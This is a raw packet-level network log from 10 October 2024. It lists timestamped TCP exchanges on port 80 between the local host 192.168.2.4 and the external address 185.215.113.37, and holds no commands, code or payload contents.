Oct 10, 2024 18:23:11.088433981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088526011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.088560104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.088565111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088572025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088586092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088593006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088619947 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.088670015 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.088830948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088886023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088898897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088933945 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.089035034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.089042902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.089055061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.089063883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.089099884 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.089112043 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.089798927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.089807034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.089819908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.089869022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.089900970 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.090212107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.090364933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.090410948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.090416908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.090430021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.090442896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.090493917 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.090570927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.090576887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.090590954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.090619087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.090631008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.091322899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.091362953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.091368914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.091403961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.091415882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.091500044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.091507912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.091520071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.091526985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.091559887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.091579914 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.092298985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.092350006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.092363119 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.092401981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.092468023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.092474937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.092487097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.092493057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.092519045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.092535019 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.093281984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.093302965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.093314886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.093348026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.093419075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.093425989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.093451023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.093466997 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.093492031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.212430000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212471008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212479115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212516069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212543011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.212568045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.212574959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212599039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.212620974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212624073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.212625980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212671041 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.212827921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212913990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212924004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212930918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.212974072 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.212997913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213006020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213020086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213046074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213072062 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213134050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213140965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213182926 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213301897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213402033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213412046 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213444948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213465929 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213466883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213474989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213511944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213561058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213649988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213690996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213705063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213711023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213754892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213785887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213922024 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.213946104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213969946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.213984966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214020014 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.214051008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214101076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214132071 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.214210033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214266062 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.214268923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214276075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214313030 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.214385033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214391947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214438915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.214591026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214679956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214725018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.214752913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214761972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214802027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.214819908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214826107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214868069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.214952946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.214994907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215001106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215017080 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215044022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215048075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215089083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215209007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215250969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215254068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215257883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215298891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215409040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215415955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215421915 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215428114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215451956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215475082 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215569973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215576887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215598106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215605021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215610981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.215617895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215641022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.215656996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.216167927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216228962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216242075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216269970 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.216293097 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.216331005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216337919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216368914 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.216449976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216456890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216470957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216499090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.216512918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.216586113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216590881 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.216635942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.217436075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217494965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217499971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217521906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.217541933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.217684984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217690945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217706919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217711926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217724085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217736006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.217751980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.217755079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217770100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.217801094 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.217839956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217847109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217860937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.217888117 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.217916965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.218030930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.218040943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.218048096 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.218054056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.218066931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.218077898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.218092918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.218175888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.218187094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.218228102 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.219080925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.219099998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.219141960 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.303342104 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303371906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303395033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303523064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303529024 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303543091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303550005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303555012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.303555012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.303582907 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.303596020 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.303693056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303765059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303772926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303780079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303783894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.303819895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.303852081 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.336724043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.336749077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.336760044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.336925030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.336936951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.336935997 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.336951971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.336965084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.336968899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.336983919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.336992025 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.336992979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337021112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337032080 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337042093 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337055922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337068081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337078094 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337080956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337091923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337138891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337138891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337187052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337198973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337212086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337224007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337272882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337342978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337352991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337367058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337380886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337380886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337394953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337424040 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337440014 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337444067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337456942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337481976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337517023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337547064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337558985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337569952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337583065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337601900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337622881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337661028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337673903 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337698936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337721109 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337748051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337762117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337795019 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337858915 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337871075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337883949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337896109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337903976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337908983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.337922096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337951899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.337987900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338000059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338011026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338027000 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338047981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338107109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338119984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338133097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338148117 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338174105 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338227034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338238955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338251114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338268995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338284016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338390112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338401079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338411093 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338423014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338433981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338434935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338438988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338452101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338454962 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338464975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338473082 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338479996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338500023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338527918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338725090 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338737011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338747978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338759899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338772058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338773012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338785887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338793039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338810921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338848114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338848114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.338875055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.338921070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.339054108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.339065075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.339076042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.339091063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.339096069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.339103937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.339117050 CEST	80	49731	185.215.113.37	192.168.2.4
